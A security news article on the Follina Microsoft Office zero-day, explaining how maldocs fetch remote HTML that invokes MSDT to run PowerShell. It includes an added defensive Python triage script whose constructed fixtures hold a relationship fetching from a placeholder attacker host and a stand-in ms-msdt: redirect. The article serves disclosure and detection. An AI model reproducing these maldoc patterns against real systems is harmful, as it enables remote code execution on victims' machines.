Microsoft Office Zero-day Vulnerability

Security researchers have recently discovered a new zero-day vulnerability in Microsoft Office that allows an attacker to execute code on the victim's machine when it is exploited.

The issue is exploited through maldocs (maliciously crafted documents) that fetch and load remote HTML content when they are opened. That HTML then invokes the Microsoft Support Diagnostic Tool (MSDT) through the Windows ms-msdt: Uniform Resource Identifier (URI) scheme, and MSDT in turn runs attacker-supplied PowerShell code.

Unexpected Detection of Microsoft Office zero-day

This zero-day was first spotted by a researcher who goes by the Twitter handle “nao_sec”.

At the time of writing, the vulnerability has not been assigned a tracking number and is known in the infosec community simply as Follina. In essence, the exploit uses a maliciously crafted Word document to run PowerShell commands through MSDT.

The PowerShell stage, in turn, extracts a Base64-encoded file from a RAR archive and decodes it. Because that archive was not available for analysis, it is unclear what malicious activity the attackers ultimately carried out.
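The chain described above leaves two inspectable artefacts: the document's relationship (.rels) part, which is what makes Word fetch the remote HTML, and the HTML itself, which references the ms-msdt: scheme. The following triage script is an added example, not code from the original article or from nao_sec; it builds a constructed, non-weaponised .docx-shaped zip in memory (the host name attacker.example and the file name stage.html are placeholders), flags external relationships of a type that Word auto-fetches on open, and checks a constructed stand-in HTML stage for the ms-msdt: scheme. The real sample's MSDT parameters are deliberately not reproduced.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Namespace of Office Open XML relationship (.rels) parts.
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"

# Relationship types that make Word fetch and render remote content when the
# document opens. Hyperlinks are also "External" relationships but only act on
# a click, so they are deliberately not in this set.
AUTO_FETCH_TYPES = {"oleObject", "attachedTemplate"}

# The URI scheme the HTML stage hands to Windows, which routes it to msdt.exe.
MSDT_URI = re.compile(r"\bms-msdt:", re.IGNORECASE)


def external_relationships(docx_bytes):
    """Return (type, target) for every relationship in the package whose
    TargetMode is External, i.e. one that points outside the .docx zip."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode") == "External":
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((rel_type, rel.get("Target", "")))
    return found


def suspicious_external_targets(docx_bytes):
    """Flag auto-fetched external relationships with an http(s) target: the
    relationship a Follina-style document uses to pull its HTML stage."""
    return [
        (rel_type, target)
        for rel_type, target in external_relationships(docx_bytes)
        if rel_type in AUTO_FETCH_TYPES
        and target.lower().startswith(("http://", "https://"))
    ]


def html_invokes_msdt(html_text):
    """True if a fetched HTML stage references the ms-msdt: scheme."""
    return MSDT_URI.search(html_text) is not None


def build_sample_docx(rels_xml):
    """Build a minimal .docx-shaped zip around a given document.xml.rels.
    Constructed for this example; it is not a real or weaponised document."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("word/document.xml", "<w:document/>")
        pkg.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


REL_TYPE_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"

# Constructed rels modelled on the Follina pattern: an oleObject relationship
# marked External that points at an HTML page on a placeholder host.
MALICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{REL_TYPE_BASE}/oleObject"
    Target="http://attacker.example/stage.html" TargetMode="External"/>
</Relationships>"""

# Constructed rels for an ordinary document: an embedded image and a hyperlink.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{REL_TYPE_BASE}/image" Target="media/image1.png"/>
  <Relationship Id="rId2" Type="{REL_TYPE_BASE}/hyperlink"
    Target="https://www.microsoft.com/" TargetMode="External"/>
</Relationships>"""

# Constructed stand-in for the fetched HTML stage. Only the scheme matters for
# the check; the real sample's msdt parameters are deliberately not reproduced.
SAMPLE_HTML = """<html><body><script>
window.location.href = "ms-msdt:/id PLACEHOLDER";
</script></body></html>"""


if __name__ == "__main__":
    print(suspicious_external_targets(build_sample_docx(MALICIOUS_RELS)))
    print(suspicious_external_targets(build_sample_docx(BENIGN_RELS)))
    print(html_invokes_msdt(SAMPLE_HTML))
```

Two caveats. The relationship check only applies to the Open XML (.docx) form of the maldoc; an RTF carrier is a different format and needs its own parser. And the check on the HTML stage can only run once you have retrieved it, which is often impossible after the hosting domain is taken down. On the endpoint, the chain can be cut independently of the document format by removing the registration of the ms-msdt: protocol handler (the HKEY_CLASSES_ROOT\ms-msdt key), which is the handler the HTML stage relies on; this is a general fact about Windows protocol handlers and not something the article above states.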

Protected View, the Microsoft Office feature that opens documents from potentially unsafe locations (such as email attachments and internet downloads) read-only and warns the user, does block the Word document variant until the user clicks “Enable Editing”. It does not help in the RTF case described below, where the file never has to be opened at all.

Zero-day in Action

The malicious document shared by nao_sec has since been analyzed by a number of security researchers, who report successfully triggering the exploit against multiple versions of Microsoft Office.

This vulnerability exists in the following version of Microsoft Office:-

  • Microsoft Office 2013
  • Microsoft Office 2016
  • Microsoft Office Pro Plus
  • Microsoft Office 2021

The sample retrieved its HTML stage from the domain “xmlformats[.]com”, which is no longer reachable. When the payload is delivered as an RTF document, the exploit becomes zero-click: it fires when the file is merely previewed (for example in the Windows Explorer preview pane), without the user having to open it.

The domain was hosted by Namecheap, which was notified of the abuse and promptly deleted it.

There is currently no clear indication of how Microsoft will respond to the discovery or how quickly it will release a patch.


Guru Baran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.